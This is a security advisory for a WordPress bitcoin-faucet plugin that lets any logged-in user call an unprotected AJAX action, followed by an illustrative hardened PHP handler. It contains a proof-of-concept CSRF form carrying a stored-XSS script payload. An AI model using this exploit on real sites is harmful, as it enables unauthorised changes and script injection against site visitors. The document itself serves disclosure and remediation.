Simple Bitcoin Faucets <= 1.7.0 - Unauthorised AJAX Call to Stored XSS

Source: wpexploit
WPEX-ID: 7F43CB8E-0C1B-4528-8C5C-B81AB42778DC
Author: Lana Codes
Published: Aug 31, 2022 - 12:00 a.m.
Tags: bitcoin faucets, security, ajax call, stored xss, csrf attack

EPSS: 0.001 (Low), percentile 21.2%

The plugin does not perform any authorisation or CSRF checks in an AJAX action, allowing any authenticated user, such as a subscriber, to call it and add/delete/edit Bonds. Furthermore, due to the lack of sanitisation and escaping, this could also lead to Stored Cross-Site Scripting issues.

Open a page containing the HTML code below as any authenticated user, or make any authenticated user open it via a CSRF attack.

<form action="https://example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="SBF_DB_code_manage_action">
    <input type="text" name="B_COMMAND" value="ADD">
    <input type="text" name="B_PARAM" value="10">
    <input type="text" name="B_PARAM2" value="<script>alert(/XSS/)</script>">
    <input type="text" name="B_PARAM3" value="1">
    <input type="submit" name="submit" value="submit">
</form>
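The advisory names three missing controls in the AJAX handler: an authorisation check, a CSRF check, and sanitisation/escaping of the stored values. The handler below is an added illustration of how a WordPress AJAX action registered under the same name and parameters would close all three; it is not the plugin's code, not the advisory author's code, and does not reflect how the plugin stores Bonds. The capability `manage_options`, the nonce action/field names `sbf_manage_bonds`/`sbf_nonce`, and the storage helper `sbf_bond_save()` are assumptions made for the example; `current_user_can()`, `check_ajax_referer()`, `sanitize_text_field()`, `absint()`, `esc_html()` and `wp_send_json_*()` are real WordPress core functions.

```php
<?php
// Added example, not the plugin's code: a hardened handler for the
// SBF_DB_code_manage_action AJAX action described in the advisory.
// Assumed: 'manage_options' is the right privilege for managing Bonds,
// and the plugin's admin page embeds the nonce with
//   wp_nonce_field( 'sbf_manage_bonds', 'sbf_nonce' );

add_action( 'wp_ajax_SBF_DB_code_manage_action', 'sbf_db_code_manage_action_secure' );

function sbf_db_code_manage_action_secure() {
    // 1. Authorisation. The advisory notes any authenticated user (e.g. a
    //    subscriber) could reach the action; wp_ajax_* hooks only guarantee
    //    that the caller is logged in, so the capability check is mandatory.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges.' ), 403 );
    }

    // 2. CSRF. Require a nonce bound to this action. A cross-site form such as
    //    the one in the PoC cannot supply it; on failure WordPress dies with 403.
    check_ajax_referer( 'sbf_manage_bonds', 'sbf_nonce' );

    // 3. Sanitisation. Whitelist the command and coerce each parameter to the
    //    type it is supposed to be instead of storing raw POST data.
    $allowed_commands = array( 'ADD', 'EDIT', 'DELETE' );
    $command = isset( $_POST['B_COMMAND'] )
        ? strtoupper( sanitize_key( wp_unslash( $_POST['B_COMMAND'] ) ) )
        : '';
    if ( ! in_array( $command, $allowed_commands, true ) ) {
        wp_send_json_error( array( 'message' => 'Unknown command.' ), 400 );
    }

    $bond = array(
        // B_PARAM / B_PARAM3 are treated as numeric (assumption for the example).
        'amount' => isset( $_POST['B_PARAM'] )  ? absint( wp_unslash( $_POST['B_PARAM'] ) )  : 0,
        'id'     => isset( $_POST['B_PARAM3'] ) ? absint( wp_unslash( $_POST['B_PARAM3'] ) ) : 0,
        // B_PARAM2 is the free-text field abused in the PoC; sanitize_text_field()
        // strips tags and control characters, so "<script>alert(/XSS/)</script>"
        // is reduced to "alert(/XSS/)" before it is ever stored.
        'label'  => isset( $_POST['B_PARAM2'] )
            ? sanitize_text_field( wp_unslash( $_POST['B_PARAM2'] ) )
            : '',
    );

    // Hypothetical storage helper standing in for the plugin's own persistence.
    $ok = sbf_bond_save( $command, $bond );
    if ( ! $ok ) {
        wp_send_json_error( array( 'message' => 'Save failed.' ), 500 );
    }

    // Return the row the admin UI will show, already escaped for HTML.
    wp_send_json_success( array( 'row' => sbf_render_bond_row( $bond ) ) );
}

// 4. Escaping on output. Even if untrusted data reached the database through
//    some other path, esc_html() neutralises it at the point of rendering;
//    this, not input sanitisation alone, is what prevents stored XSS.
function sbf_render_bond_row( array $bond ) {
    return '<tr>'
        . '<td>' . (int) $bond['id'] . '</td>'
        . '<td>' . esc_html( $bond['label'] ) . '</td>'
        . '<td>' . (int) $bond['amount'] . '</td>'
        . '</tr>';
}

// Placeholder for the plugin's storage logic (assumption for the example).
function sbf_bond_save( $command, array $bond ) {
    $bonds = get_option( 'sbf_bonds_example', array() );
    switch ( $command ) {
        case 'ADD':
        case 'EDIT':
            $bonds[ $bond['id'] ] = $bond;
            break;
        case 'DELETE':
            unset( $bonds[ $bond['id'] ] );
            break;
    }
    return update_option( 'sbf_bonds_example', $bonds );
}
```

The order of the checks matters for detection and for failure mode: the capability check runs first so that an unauthorised call is rejected with a 403 before any nonce or input handling, and `check_ajax_referer()` dies on its own when the nonce is absent, which is exactly what happens when the PoC form above is submitted from a third-party page.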

